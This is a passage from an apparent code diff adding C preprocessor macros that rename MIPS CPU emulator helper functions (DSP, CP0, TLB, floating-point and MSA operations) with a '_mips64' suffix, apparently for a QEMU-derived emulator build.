helper_maq_sa_w_phl_mips64 +#define helper_maq_sa_w_phr helper_maq_sa_w_phr_mips64 +#define helper_mulq_s_w helper_mulq_s_w_mips64 +#define helper_mulq_rs_w helper_mulq_rs_w_mips64 +#define helper_bitrev helper_bitrev_mips64 +#define helper_insv helper_insv_mips64 +#define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mips64 +#define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mips64 +#define helper_cmpgu_le_qb helper_cmpgu_le_qb_mips64 +#define helper_cmpu_eq_qb helper_cmpu_eq_qb_mips64 +#define helper_cmpu_lt_qb helper_cmpu_lt_qb_mips64 +#define helper_cmpu_le_qb helper_cmpu_le_qb_mips64 +#define helper_cmp_eq_ph helper_cmp_eq_ph_mips64 +#define helper_cmp_lt_ph helper_cmp_lt_ph_mips64 +#define helper_cmp_le_ph helper_cmp_le_ph_mips64 +#define helper_pick_qb helper_pick_qb_mips64 +#define helper_pick_ph helper_pick_ph_mips64 +#define helper_packrl_ph helper_packrl_ph_mips64 +#define helper_extr_w helper_extr_w_mips64 +#define helper_extr_r_w helper_extr_r_w_mips64 +#define helper_extr_rs_w helper_extr_rs_w_mips64 +#define helper_extr_s_h helper_extr_s_h_mips64 +#define helper_extp helper_extp_mips64 +#define helper_extpdp helper_extpdp_mips64 +#define helper_shilo helper_shilo_mips64 +#define helper_mthlip helper_mthlip_mips64 +#define cpu_wrdsp cpu_wrdsp_mips64 +#define helper_wrdsp helper_wrdsp_mips64 +#define cpu_rddsp cpu_rddsp_mips64 +#define helper_rddsp helper_rddsp_mips64 +#define helper_raise_exception_err helper_raise_exception_err_mips64 +#define helper_clo helper_clo_mips64 +#define helper_clz helper_clz_mips64 +#define helper_muls helper_muls_mips64 +#define helper_mulsu helper_mulsu_mips64 +#define helper_macc helper_macc_mips64 +#define helper_macchi helper_macchi_mips64 +#define helper_maccu helper_maccu_mips64 +#define helper_macchiu helper_macchiu_mips64 +#define helper_msac helper_msac_mips64 +#define helper_msachi helper_msachi_mips64 +#define helper_msacu helper_msacu_mips64 +#define helper_msachiu helper_msachiu_mips64 +#define helper_mulhi helper_mulhi_mips64 +#define helper_mulhiu helper_mulhiu_mips64 +#define helper_mulshi helper_mulshi_mips64 +#define helper_mulshiu helper_mulshiu_mips64 +#define helper_bitswap helper_bitswap_mips64 +#define helper_ll helper_ll_mips64 +#define helper_sc helper_sc_mips64 +#define helper_swl helper_swl_mips64 +#define helper_swr helper_swr_mips64 +#define helper_lwm helper_lwm_mips64 +#define helper_swm helper_swm_mips64 +#define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips64 +#define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips64 +#define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips64 +#define helper_mfc0_random helper_mfc0_random_mips64 +#define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips64 +#define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips64 +#define helper_mfc0_tcbind helper_mfc0_tcbind_mips64 +#define helper_mftc0_tcbind helper_mftc0_tcbind_mips64 +#define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips64 +#define helper_mftc0_tcrestart helper_mftc0_tcrestart_mips64 +#define helper_mfc0_tchalt helper_mfc0_tchalt_mips64 +#define helper_mftc0_tchalt helper_mftc0_tchalt_mips64 +#define helper_mfc0_tccontext helper_mfc0_tccontext_mips64 +#define helper_mftc0_tccontext helper_mftc0_tccontext_mips64 +#define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips64 +#define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips64 +#define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips64 +#define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips64 +#define helper_mfc0_count helper_mfc0_count_mips64 +#define helper_mftc0_entryhi helper_mftc0_entryhi_mips64 +#define helper_mftc0_cause helper_mftc0_cause_mips64 +#define helper_mftc0_status helper_mftc0_status_mips64 +#define helper_mfc0_lladdr helper_mfc0_lladdr_mips64 +#define helper_mfc0_watchlo helper_mfc0_watchlo_mips64 +#define helper_mfc0_watchhi helper_mfc0_watchhi_mips64 +#define helper_mfc0_debug helper_mfc0_debug_mips64 +#define helper_mftc0_debug helper_mftc0_debug_mips64 +#define helper_mtc0_index helper_mtc0_index_mips64 +#define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips64 +#define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips64 +#define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips64 +#define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips64 +#define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips64 +#define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips64 +#define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips64 +#define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips64 +#define helper_mtc0_yqmask helper_mtc0_yqmask_mips64 +#define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips64 +#define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips64 +#define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips64 +#define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips64 +#define helper_mtc0_tcbind helper_mtc0_tcbind_mips64 +#define helper_mttc0_tcbind helper_mttc0_tcbind_mips64 +#define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips64 +#define helper_mttc0_tcrestart helper_mttc0_tcrestart_mips64 +#define helper_mtc0_tchalt helper_mtc0_tchalt_mips64 +#define helper_mttc0_tchalt helper_mttc0_tchalt_mips64 +#define helper_mtc0_tccontext helper_mtc0_tccontext_mips64 +#define helper_mttc0_tccontext helper_mttc0_tccontext_mips64 +#define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips64 +#define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips64 +#define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips64 +#define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips64 +#define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips64 +#define helper_mtc0_context helper_mtc0_context_mips64 +#define helper_mtc0_pagemask helper_mtc0_pagemask_mips64 +#define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips64 +#define helper_mtc0_wired helper_mtc0_wired_mips64 +#define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips64 +#define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips64 +#define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips64 +#define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips64 +#define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips64 +#define helper_mtc0_hwrena helper_mtc0_hwrena_mips64 +#define helper_mtc0_count helper_mtc0_count_mips64 +#define helper_mtc0_entryhi helper_mtc0_entryhi_mips64 +#define helper_mttc0_entryhi helper_mttc0_entryhi_mips64 +#define helper_mtc0_compare helper_mtc0_compare_mips64 +#define helper_mtc0_status helper_mtc0_status_mips64 +#define helper_mttc0_status helper_mttc0_status_mips64 +#define helper_mtc0_intctl helper_mtc0_intctl_mips64 +#define helper_mtc0_srsctl helper_mtc0_srsctl_mips64 +#define helper_mtc0_cause helper_mtc0_cause_mips64 +#define helper_mttc0_cause helper_mttc0_cause_mips64 +#define helper_mftc0_epc helper_mftc0_epc_mips64 +#define helper_mftc0_ebase helper_mftc0_ebase_mips64 +#define helper_mtc0_ebase helper_mtc0_ebase_mips64 +#define helper_mttc0_ebase helper_mttc0_ebase_mips64 +#define helper_mftc0_configx helper_mftc0_configx_mips64 +#define helper_mtc0_config0 helper_mtc0_config0_mips64 +#define helper_mtc0_config2 helper_mtc0_config2_mips64 +#define helper_mtc0_config4 helper_mtc0_config4_mips64 +#define helper_mtc0_config5 helper_mtc0_config5_mips64 +#define helper_mtc0_lladdr helper_mtc0_lladdr_mips64 +#define helper_mtc0_watchlo helper_mtc0_watchlo_mips64 +#define helper_mtc0_watchhi helper_mtc0_watchhi_mips64 +#define helper_mtc0_xcontext helper_mtc0_xcontext_mips64 +#define helper_mtc0_framemask helper_mtc0_framemask_mips64 +#define helper_mtc0_debug helper_mtc0_debug_mips64 +#define helper_mttc0_debug helper_mttc0_debug_mips64 +#define helper_mtc0_performance0 helper_mtc0_performance0_mips64 +#define helper_mtc0_taglo helper_mtc0_taglo_mips64 +#define helper_mtc0_datalo helper_mtc0_datalo_mips64 +#define helper_mtc0_taghi helper_mtc0_taghi_mips64 +#define helper_mtc0_datahi helper_mtc0_datahi_mips64 +#define helper_mftgpr helper_mftgpr_mips64 +#define helper_mftlo helper_mftlo_mips64 +#define helper_mfthi helper_mfthi_mips64 +#define helper_mftacx helper_mftacx_mips64 +#define helper_mftdsp helper_mftdsp_mips64 +#define helper_mttgpr helper_mttgpr_mips64 +#define helper_mttlo helper_mttlo_mips64 +#define helper_mtthi helper_mtthi_mips64 +#define helper_mttacx helper_mttacx_mips64 +#define helper_mttdsp helper_mttdsp_mips64 +#define helper_dmt helper_dmt_mips64 +#define helper_emt helper_emt_mips64 +#define helper_dvpe helper_dvpe_mips64 +#define helper_evpe helper_evpe_mips64 +#define helper_fork helper_fork_mips64 +#define helper_yield helper_yield_mips64 +#define r4k_helper_tlbinv r4k_helper_tlbinv_mips64 +#define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips64 +#define r4k_helper_tlbwi r4k_helper_tlbwi_mips64 +#define r4k_helper_tlbwr r4k_helper_tlbwr_mips64 +#define r4k_helper_tlbp r4k_helper_tlbp_mips64 +#define r4k_helper_tlbr r4k_helper_tlbr_mips64 +#define helper_tlbwi helper_tlbwi_mips64 +#define helper_tlbwr helper_tlbwr_mips64 +#define helper_tlbp helper_tlbp_mips64 +#define helper_tlbr helper_tlbr_mips64 +#define helper_tlbinv helper_tlbinv_mips64 +#define helper_tlbinvf helper_tlbinvf_mips64 +#define helper_di helper_di_mips64 +#define helper_ei helper_ei_mips64 +#define helper_eret helper_eret_mips64 +#define helper_deret helper_deret_mips64 +#define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips64 +#define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips64 +#define helper_rdhwr_cc helper_rdhwr_cc_mips64 +#define helper_rdhwr_ccres helper_rdhwr_ccres_mips64 +#define helper_pmon helper_pmon_mips64 +#define helper_wait helper_wait_mips64 +#define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips64 +#define mips_cpu_unassigned_access mips_cpu_unassigned_access_mips64 +#define ieee_rm ieee_rm_mips64 +#define helper_cfc1 helper_cfc1_mips64 +#define helper_ctc1 helper_ctc1_mips64 +#define ieee_ex_to_mips ieee_ex_to_mips_mips64 +#define helper_float_sqrt_d helper_float_sqrt_d_mips64 +#define helper_float_sqrt_s helper_float_sqrt_s_mips64 +#define helper_float_cvtd_s helper_float_cvtd_s_mips64 +#define helper_float_cvtd_w helper_float_cvtd_w_mips64 +#define helper_float_cvtd_l helper_float_cvtd_l_mips64 +#define helper_float_cvtl_d helper_float_cvtl_d_mips64 +#define helper_float_cvtl_s helper_float_cvtl_s_mips64 +#define helper_float_cvtps_pw helper_float_cvtps_pw_mips64 +#define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips64 +#define helper_float_cvts_d helper_float_cvts_d_mips64 +#define helper_float_cvts_w helper_float_cvts_w_mips64 +#define helper_float_cvts_l helper_float_cvts_l_mips64 +#define helper_float_cvts_pl helper_float_cvts_pl_mips64 +#define helper_float_cvts_pu helper_float_cvts_pu_mips64 +#define helper_float_cvtw_s helper_float_cvtw_s_mips64 +#define helper_float_cvtw_d helper_float_cvtw_d_mips64 +#define helper_float_roundl_d helper_float_roundl_d_mips64 +#define helper_float_roundl_s helper_float_roundl_s_mips64 +#define helper_float_roundw_d helper_float_roundw_d_mips64 +#define helper_float_roundw_s helper_float_roundw_s_mips64 +#define helper_float_truncl_d helper_float_truncl_d_mips64 +#define helper_float_truncl_s helper_float_truncl_s_mips64 +#define helper_float_truncw_d helper_float_truncw_d_mips64 +#define helper_float_truncw_s helper_float_truncw_s_mips64 +#define helper_float_ceill_d helper_float_ceill_d_mips64 +#define helper_float_ceill_s helper_float_ceill_s_mips64 +#define helper_float_ceilw_d helper_float_ceilw_d_mips64 +#define helper_float_ceilw_s helper_float_ceilw_s_mips64 +#define helper_float_floorl_d helper_float_floorl_d_mips64 +#define helper_float_floorl_s helper_float_floorl_s_mips64 +#define helper_float_floorw_d helper_float_floorw_d_mips64 +#define helper_float_floorw_s helper_float_floorw_s_mips64 +#define helper_float_abs_d helper_float_abs_d_mips64 +#define helper_float_abs_s helper_float_abs_s_mips64 +#define helper_float_abs_ps helper_float_abs_ps_mips64 +#define helper_float_chs_d helper_float_chs_d_mips64 +#define helper_float_chs_s helper_float_chs_s_mips64 +#define helper_float_chs_ps helper_float_chs_ps_mips64 +#define helper_float_maddf_s helper_float_maddf_s_mips64 +#define helper_float_maddf_d helper_float_maddf_d_mips64 +#define helper_float_msubf_s helper_float_msubf_s_mips64 +#define helper_float_msubf_d helper_float_msubf_d_mips64 +#define helper_float_max_s helper_float_max_s_mips64 +#define helper_float_max_d helper_float_max_d_mips64 +#define helper_float_maxa_s helper_float_maxa_s_mips64 +#define helper_float_maxa_d helper_float_maxa_d_mips64 +#define helper_float_min_s helper_float_min_s_mips64 +#define helper_float_min_d helper_float_min_d_mips64 +#define helper_float_mina_s helper_float_mina_s_mips64 +#define helper_float_mina_d helper_float_mina_d_mips64 +#define helper_float_rint_s helper_float_rint_s_mips64 +#define helper_float_rint_d helper_float_rint_d_mips64 +#define helper_float_class_s helper_float_class_s_mips64 +#define helper_float_class_d helper_float_class_d_mips64 +#define helper_float_recip_d helper_float_recip_d_mips64 +#define helper_float_recip_s helper_float_recip_s_mips64 +#define helper_float_rsqrt_d helper_float_rsqrt_d_mips64 +#define helper_float_rsqrt_s helper_float_rsqrt_s_mips64 +#define helper_float_recip1_d helper_float_recip1_d_mips64 +#define helper_float_recip1_s helper_float_recip1_s_mips64 +#define helper_float_recip1_ps helper_float_recip1_ps_mips64 +#define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips64 +#define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips64 +#define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips64 +#define helper_float_add_d helper_float_add_d_mips64 +#define helper_float_add_s helper_float_add_s_mips64 +#define helper_float_add_ps helper_float_add_ps_mips64 +#define helper_float_sub_d helper_float_sub_d_mips64 +#define helper_float_sub_s helper_float_sub_s_mips64 +#define helper_float_sub_ps helper_float_sub_ps_mips64 +#define helper_float_mul_d helper_float_mul_d_mips64 +#define helper_float_mul_s helper_float_mul_s_mips64 +#define helper_float_mul_ps helper_float_mul_ps_mips64 +#define helper_float_div_d helper_float_div_d_mips64 +#define helper_float_div_s helper_float_div_s_mips64 +#define helper_float_div_ps helper_float_div_ps_mips64 +#define helper_float_madd_d helper_float_madd_d_mips64 +#define helper_float_madd_s helper_float_madd_s_mips64 +#define helper_float_madd_ps helper_float_madd_ps_mips64 +#define helper_float_msub_d helper_float_msub_d_mips64 +#define helper_float_msub_s helper_float_msub_s_mips64 +#define helper_float_msub_ps helper_float_msub_ps_mips64 +#define helper_float_nmadd_d helper_float_nmadd_d_mips64 +#define helper_float_nmadd_s helper_float_nmadd_s_mips64 +#define helper_float_nmadd_ps helper_float_nmadd_ps_mips64 +#define helper_float_nmsub_d helper_float_nmsub_d_mips64 +#define helper_float_nmsub_s helper_float_nmsub_s_mips64 +#define helper_float_nmsub_ps helper_float_nmsub_ps_mips64 +#define helper_float_recip2_d helper_float_recip2_d_mips64 +#define helper_float_recip2_s helper_float_recip2_s_mips64 +#define helper_float_recip2_ps helper_float_recip2_ps_mips64 +#define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips64 +#define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips64 +#define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips64 +#define helper_float_addr_ps helper_float_addr_ps_mips64 +#define helper_float_mulr_ps helper_float_mulr_ps_mips64 +#define helper_cmp_d_f helper_cmp_d_f_mips64 +#define helper_cmpabs_d_f helper_cmpabs_d_f_mips64 +#define helper_cmp_d_un helper_cmp_d_un_mips64 +#define helper_cmpabs_d_un helper_cmpabs_d_un_mips64 +#define helper_cmp_d_eq helper_cmp_d_eq_mips64 +#define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips64 +#define helper_cmp_d_ueq helper_cmp_d_ueq_mips64 +#define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips64 +#define helper_cmp_d_olt helper_cmp_d_olt_mips64 +#define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips64 +#define helper_cmp_d_ult helper_cmp_d_ult_mips64 +#define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips64 +#define helper_cmp_d_ole helper_cmp_d_ole_mips64 +#define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips64 +#define helper_cmp_d_ule helper_cmp_d_ule_mips64 +#define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips64 +#define helper_cmp_d_sf helper_cmp_d_sf_mips64 +#define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips64 +#define helper_cmp_d_ngle helper_cmp_d_ngle_mips64 +#define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mips64 +#define helper_cmp_d_seq helper_cmp_d_seq_mips64 +#define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips64 +#define helper_cmp_d_ngl helper_cmp_d_ngl_mips64 +#define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips64 +#define helper_cmp_d_lt helper_cmp_d_lt_mips64 +#define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips64 +#define helper_cmp_d_nge helper_cmp_d_nge_mips64 +#define helper_cmpabs_d_nge helper_cmpabs_d_nge_mips64 +#define helper_cmp_d_le helper_cmp_d_le_mips64 +#define helper_cmpabs_d_le helper_cmpabs_d_le_mips64 +#define helper_cmp_d_ngt helper_cmp_d_ngt_mips64 +#define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips64 +#define helper_cmp_s_f helper_cmp_s_f_mips64 +#define helper_cmpabs_s_f helper_cmpabs_s_f_mips64 +#define helper_cmp_s_un helper_cmp_s_un_mips64 +#define helper_cmpabs_s_un helper_cmpabs_s_un_mips64 +#define helper_cmp_s_eq helper_cmp_s_eq_mips64 +#define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips64 +#define helper_cmp_s_ueq helper_cmp_s_ueq_mips64 +#define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips64 +#define helper_cmp_s_olt helper_cmp_s_olt_mips64 +#define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips64 +#define helper_cmp_s_ult helper_cmp_s_ult_mips64 +#define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips64 +#define helper_cmp_s_ole helper_cmp_s_ole_mips64 +#define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips64 +#define helper_cmp_s_ule helper_cmp_s_ule_mips64 +#define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips64 +#define helper_cmp_s_sf helper_cmp_s_sf_mips64 +#define helper_cmpabs_s_sf helper_cmpabs_s_sf_mips64 +#define helper_cmp_s_ngle helper_cmp_s_ngle_mips64 +#define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips64 +#define helper_cmp_s_seq helper_cmp_s_seq_mips64 +#define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips64 +#define helper_cmp_s_ngl helper_cmp_s_ngl_mips64 +#define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips64 +#define helper_cmp_s_lt helper_cmp_s_lt_mips64 +#define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips64 +#define helper_cmp_s_nge helper_cmp_s_nge_mips64 +#define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips64 +#define helper_cmp_s_le helper_cmp_s_le_mips64 +#define helper_cmpabs_s_le helper_cmpabs_s_le_mips64 +#define helper_cmp_s_ngt helper_cmp_s_ngt_mips64 +#define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips64 +#define helper_cmp_ps_f helper_cmp_ps_f_mips64 +#define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips64 +#define helper_cmp_ps_un helper_cmp_ps_un_mips64 +#define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips64 +#define helper_cmp_ps_eq helper_cmp_ps_eq_mips64 +#define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips64 +#define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips64 +#define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips64 +#define helper_cmp_ps_olt helper_cmp_ps_olt_mips64 +#define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips64 +#define helper_cmp_ps_ult helper_cmp_ps_ult_mips64 +#define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips64 +#define helper_cmp_ps_ole helper_cmp_ps_ole_mips64 +#define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips64 +#define helper_cmp_ps_ule helper_cmp_ps_ule_mips64 +#define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips64 +#define helper_cmp_ps_sf helper_cmp_ps_sf_mips64 +#define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips64 +#define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips64 +#define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips64 +#define helper_cmp_ps_seq helper_cmp_ps_seq_mips64 +#define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mips64 +#define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips64 +#define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mips64 +#define helper_cmp_ps_lt helper_cmp_ps_lt_mips64 +#define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips64 +#define helper_cmp_ps_nge helper_cmp_ps_nge_mips64 +#define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips64 +#define helper_cmp_ps_le helper_cmp_ps_le_mips64 +#define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips64 +#define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips64 +#define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips64 +#define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips64 +#define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips64 +#define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips64 +#define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips64 +#define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips64 +#define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips64 +#define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips64 +#define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips64 +#define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mips64 +#define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips64 +#define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips64 +#define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips64 +#define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips64 +#define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips64 +#define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips64 +#define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips64 +#define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips64 +#define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips64 +#define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips64 +#define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mips64 +#define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mips64 +#define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips64 +#define helper_r6_cmp_s_af helper_r6_cmp_s_af_mips64 +#define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips64 +#define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips64 +#define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mips64 +#define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips64 +#define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips64 +#define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips64 +#define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips64 +#define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mips64 +#define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips64 +#define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips64 +#define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips64 +#define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips64 +#define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips64 +#define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips64 +#define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips64 +#define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips64 +#define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips64 +#define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips64 +#define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips64 +#define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips64 +#define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips64 +#define helper_msa_ld_df helper_msa_ld_df_mips64 +#define helper_msa_st_df helper_msa_st_df_mips64 +#define no_mmu_map_address no_mmu_map_address_mips64 +#define fixed_mmu_map_address fixed_mmu_map_address_mips64 +#define r4k_map_address r4k_map_address_mips64 +#define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips64 +#define mips_cpu_handle_mmu_fault mips_cpu_handle_mmu_fault_mips64 +#define cpu_mips_translate_address cpu_mips_translate_address_mips64 +#define exception_resume_pc exception_resume_pc_mips64 +#define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips64 +#define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips64 +#define r4k_invalidate_tlb r4k_invalidate_tlb_mips64 +#define helper_absq_s_ob helper_absq_s_ob_mips64 +#define helper_absq_s_qh helper_absq_s_qh_mips64 +#define helper_absq_s_pw helper_absq_s_pw_mips64 +#define helper_adduh_ob helper_adduh_ob_mips64 +#define helper_adduh_r_ob helper_adduh_r_ob_mips64 +#define helper_subuh_ob helper_subuh_ob_mips64 +#define helper_subuh_r_ob helper_subuh_r_ob_mips64 +#define helper_addq_pw helper_addq_pw_mips64 +#define helper_addq_qh helper_addq_qh_mips64 +#define helper_addq_s_pw helper_addq_s_pw_mips64 +#define helper_addq_s_qh helper_addq_s_qh_mips64 +#define helper_addu_ob helper_addu_ob_mips64 +#define helper_addu_qh helper_addu_qh_mips64 +#define helper_addu_s_ob helper_addu_s_ob_mips64 +#define helper_addu_s_qh helper_addu_s_qh_mips64 +#define helper_subq_pw helper_subq_pw_mips64 +#define helper_subq_qh helper_subq_qh_mips64 +#define helper_subq_s_pw helper_subq_s_pw_mips64 +#define helper_subq_s_qh helper_subq_s_qh_mips64 +#define helper_subu_ob helper_subu_ob_mips64 +#define helper_subu_qh helper_subu_qh_mips64 +#define helper_subu_s_ob helper_subu_s_ob_mips64 +#define helper_subu_s_qh helper_subu_s_qh_mips64 +#define helper_raddu_l_ob helper_raddu_l_ob_mips64 +#define helper_precr_ob_qh helper_precr_ob_qh_mips64 +#define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips64 +#define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips64 +#define helper_precrq_ob_qh helper_precrq_ob_qh_mips64 +#define helper_precrq_qh_pw helper_precrq_qh_pw_mips64 +#define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips64 +#define helper_precrq_pw_l helper_precrq_pw_l_mips64 +#define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips64 +#define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips64 +#define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips64 +#define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips64 +#define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips64 +#define helper_precequ_qh_obl helper_precequ_qh_obl_mips64 +#define helper_precequ_qh_obr helper_precequ_qh_obr_mips64 +#define helper_precequ_qh_obla helper_precequ_qh_obla_mips64 +#define helper_precequ_qh_obra helper_precequ_qh_obra_mips64 +#define helper_preceu_qh_obl helper_preceu_qh_obl_mips64 +#define helper_preceu_qh_obr helper_preceu_qh_obr_mips64 +#define helper_preceu_qh_obla helper_preceu_qh_obla_mips64 +#define helper_preceu_qh_obra helper_preceu_qh_obra_mips64 +#define helper_shll_ob helper_shll_ob_mips64 +#define helper_shrl_ob helper_shrl_ob_mips64 +#define helper_shra_ob helper_shra_ob_mips64 +#define helper_shra_r_ob helper_shra_r_ob_mips64 +#define helper_shll_qh helper_shll_qh_mips64 +#define helper_shll_s_qh helper_shll_s_qh_mips64 +#define helper_shrl_qh helper_shrl_qh_mips64 +#define helper_shra_qh helper_shra_qh_mips64 +#define helper_shra_r_qh helper_shra_r_qh_mips64 +#define helper_shll_pw helper_shll_pw_mips64 +#define helper_shll_s_pw helper_shll_s_pw_mips64 +#define helper_shra_pw helper_shra_pw_mips64 +#define helper_shra_r_pw helper_shra_r_pw_mips64 +#define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips64 +#define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips64 +#define helper_mulq_rs_qh helper_mulq_rs_qh_mips64 +#define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips64 +#define 